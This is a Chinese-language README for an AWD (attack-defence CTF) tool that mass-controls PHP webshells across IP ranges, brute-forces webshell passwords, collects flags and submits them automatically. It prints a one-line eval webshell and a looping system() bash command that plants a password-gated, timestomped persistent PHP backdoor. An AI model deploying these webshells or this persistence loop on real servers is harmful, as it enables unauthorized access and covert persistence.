AWD Predator Framework v2.0
--code by AresX
-
在AWD攻防赛中通过给定的webshell批量获取提交flag
-
为不会现场挖洞写脚本的菜鸡准备
-
用py去实现菜刀是一件代码量很大的事情,懒得做也不会做(以后可能会做),所以需要手动设置一句话的功能函数和方法
-
针对简单的单参数传递的一句话和特定的加密一句话
启动
python console.py
webshell
添加已知的webshell,仅支持php,GET和POST方法使用eval和exec函数的一句话木马
添加webshell
命令add
使用方法: add [shell path] [pwd] [type(eval/exec)] [method(get/post)]
如一句话为<?php @eval($_POST[‘cmd’]);?>
路径为x.x.x.x:8001://index/cmd.php
一句话密码为cmd
功能函数为eval
方法为POST
example:add :8001/index/cmd.php cmd eval post
注意这里添加一句话路径不加ip地址,ip地址要使用命令ip
生成
命令执行后webshell的路径和密码会以字典的形式储存
处理了使用md5加密的eval函数一句话,
get方法在添加时,可添加带md5加密的密码的路径
如:add :8003/x.php?pass=fuckyou x eval get
post方法请在flag.py
中修改for j in POST_eval_shells_path_pwd:
循环中的eval_POST_data['pass']
为自己的密码,密码将被自动传递
post添加方法同add :8001/index/cmd.php cmd eval post
显示添加的webshell
命令show
将显示所有添加的webshell路径和密码
保存,读取,清空webshell
保存已经添加的webshell路径和密码,方便临场修改代码
保存:save
读取:load
清空:clear
//清空不会清空已经储存的webshell,除非在清空后执行保存命令
Webshell爆破
采用一种提速千倍的爆破方法
命令: crack http://xxx.php
字典储存在auxi/pwd.txt
中,可自行完善字典
iplist
根据输入生成指定段的ip列表
生成列表
命令: ip x.x.a-b.x
可设定acb任意段的ip列表,使用'-'连接左右区间
添加指定ip
命令: ip x.x.x.x
执行命令后,x.x.x.x
将被添加到ip列表中,会自动去除重复项和进行排序
查看已经生成的列表
命令: showip
显示生成的ip列表
清空ip列表
命令: clearip
去掉指定ip
命令: removeip x.x.x.x
flag
通过iplist和webshell获取flag,将获取到的flag提交到指定服务器
获取flag
遍历iplist中所有的地址尝试通过所有已经添加的webshell获取flag,在执行此命令前需设定iplist,否则报错
命令:getflag [command]
example:getflag curl www.baidu.com/flag.txt
获取命令如果不需要修改只需完整输入一次,之后可直接执行getflag
查看flag
命令: showflag
提交flag
攻防赛环境中获取到的flag通常不是标准格式,flag.py
中的submit_flag
函数中已经使用了re.compile(r'flag{\w+?}')
尝试匹配标准flag格式
如果出现问题,请自行在flag.py
文件的submit_flag
函数中使用正则匹配获得标准flag进行提交
提交flag 需设定提交flag的链接,以及cookie和data,使用"?"替换flag在data中所在的参数
命令: submit [url] [cookie] [data](use '?' replace the flag )
example: submit http:xxx.xxx.xx/xx/ JSESSIONID=A6F8;route=6cf03 pid=-1&pidName=&flag=?
去掉cookie中的空格,data中flag所在位置需用?代替!
提交命令如果不需要修改只需完整输入一次,之后可直接执行submit
submit完成之后会有清空flag的选项(y/n)
清空flag
命令: clearflag
上传
文件木马上传
命令: upload <file>(default='auxi/shell.php')
默认上传文件为auxi/shell.php
如需使用修改默认文件,默认文件为加密不死马
如需上传其他文件,将文件储存在auxi/
目录下
执行upload xxx
即可
如上传默认文件,直接执行upload
如果文件上传成功,会自动访问一次上传的文件,激活不死马
命令木马上传
命令: cupload
连接一句话执行bash命令生成不死马.index1.php
bash命令为:system('while true;do echo \'<?php if(md5($_POST["pass"])=="3a50065e1709acc47ba0c9238294364f"){@eval($_POST[a]);} ?>\' >fuck.php;touch -m -d "2017-11-12 10:10:10" .index1.php;sleep 1;done;');
如果要修改请修改command.py
中的data[z0]
目录结构
###########
├── Readme.md //帮助文档
├── console.py //启动
├── core // 核心模块
│ ├── shells.py //写入,读取,保存webshell
│ ├── flag.py // 获取,提交flag
│ ├── iplist.py // 生成ip列表
│—— auxi //辅助模块
| |—— upload.py //webshell上传功能
| |—— shell.php //默认上传文件
| |—— webshell.txt //一句话储存路径
| |—— command.py //上传bash不死马
|—— data //webshell数据储存